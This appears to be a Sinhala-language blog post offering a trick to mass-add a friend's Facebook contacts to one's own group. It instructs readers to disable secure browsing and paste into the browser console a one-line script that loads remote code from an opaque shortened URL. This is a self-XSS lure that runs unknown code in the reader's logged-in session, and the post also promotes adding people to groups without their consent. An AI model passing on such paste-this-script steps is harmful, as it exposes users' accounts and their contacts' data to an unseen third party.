Face Bookගෲප් වලට Members la බස්සන අලුත්ම විදිය!

  • Posted by ceylonpicturesnet
  • at 10:45 AM -
  • 0 comments
!!!!Face Bookගෲප් වලට Members la බස්සන අලුත්ම විදිය.!!!!
 
මිනිත්තු 10න් 5000ක් උනත් ගන්න පුලුවන්..
මේක කලින් අර ආපු java scrip එක වගේ නෙමෙයි මේකෙන් අනිත් යාලුවන්ගේ යාලුවොත් තමන්ගේ Group එකට ඈදලා දාන්න පුලුවන්. මෙන්න ක්‍රමය කරලා බලන්න.

01-යන්න Group වලින් තමන්ට Add කරන්න ඔන Group එකට.
02-හෑබෑයි මේක කරන්න Browser වල HTTPS OFF කරලා තියෙන්න ඔනා. දන්නෙ නෑති අය ඒක මේ විදියට කරන්න.
{ඔයාලගේ FB එකේ Account Setting->Security->Secure Browsing->Edit->Remove thick(හරි ලකුන අයින් කරන්න)->save}
03-දෑන් හොදට යාලුවෝ ඉන්න හොද බුවෙක් තොරගන්න. එයගේ යාලුවෝ ටික එකTab එකක Open කර ගන්න. තමන්ට යාලුවෝ Add කරන්න ඕන Group එක අනිත් Tab එකක Open කරගන්න

{ තම තමන් බාවිතා කරන වෙබ් බ්‍රවුසර් එක අනුව පහත පියවරවල් නිසි පරිදි අනුගමනය කරන්න.
Google Chrome භාවිතා කරන අය පහල පියවර අනුගමනය කරන්න.

1. යාළුවන්ව එකතු කරන්න ඕන කරන ගෲප් එකට යන්න.
2. Page එකේ ඔබ කැමති තැනක Right Click කරන්න.
3. "Inspect Element" යන්න තෝරා ඉන් පසු "Console" තෝරන්න.
4. පහත දී තිබෙන Script Code එක Copy කර Paste කරන්න.

Fire Fox භාවිතා කරන අය පහල පියවර අනුගමනය කරන්න.

1. යාළුවන්ව එකතු කරන්න ඕන කරන ගෲප් එකට යන්න.
2. CTRL + SHIFT + K යතුරු එකවර ඔබන්න.
3. පහත දී තිබෙන Script Code එක Copy කර Paste කරන්න. }

document.body.appendChild(document.createElement('script')).src='http://goo.gl/jhzzs';


පේස්ට් කිරීමට Ctrl + V යන කී එකවර ප්‍රෙස් කරන්න. එවිට අවශ්‍ය තැනට පේස්ට් වීම සිදුවේ.

ඉන් පසු Enter ඔබන්න එපා කලින් Java Script රන් කලා වගේ. දෑන් යාලුවගේ friendsla ඉන්න ටෑබ් එකට යන්න ඒක refresh කරන්න එතකොටම group එකේ ටෑබ් එකට ආපහු ඈවිල්ල අර code එක paste කරපු තෑනින් curser එක තියලා enter කරන්න. හෑබෑයි අරක refresh වෙන්න කලින් ඉක්මනට tab මාරු වෙලා වෑඩේ කරන්න ඕනා.

දෑන් යාලුවො Add වෙනවා පෙන්නනවා ඈති. හෑබෑයි මේකෙන් යාලුවෝ Add උනාද කියලා බලන්න නම් වෙන එක ඉවර වෙනකන් ඉදලා එක Group එක Refresh කරන්න ඕන..
සෑයු:-
*යාලුවන් Add වීම ඉවර වෙන තුරු Browser එක පාවිච්චි නොකර සිටීමත් යාලුවන්ගේ Tab එක Refresh කල වහාම Code එක Run කිරීමටත් වග බලා ගත යුතුය.
*මෙම ක්‍රමය සාමාන්යෙන් බොහෝ Profile වලට වෑඩ කලත් සමහර අලුත් Profile වලට වෑඩ නොකිරීමට ඉඩ ඈත. අලුත් Profile වල Update නිසා බොහෝ Java Script රන් කිරීම නවතා ඈත.

Author

Written by Admin

Aliquam molestie ligula vitae nunc lobortis dictum varius tellus porttitor. Suspendisse vehicula diam a ligula malesuada a pellentesque turpis facilisis. Vestibulum a urna elit. Nulla bibendum dolor suscipit tortor euismod eu laoreet odio facilisis.

0 comments:

Free Face Book Likes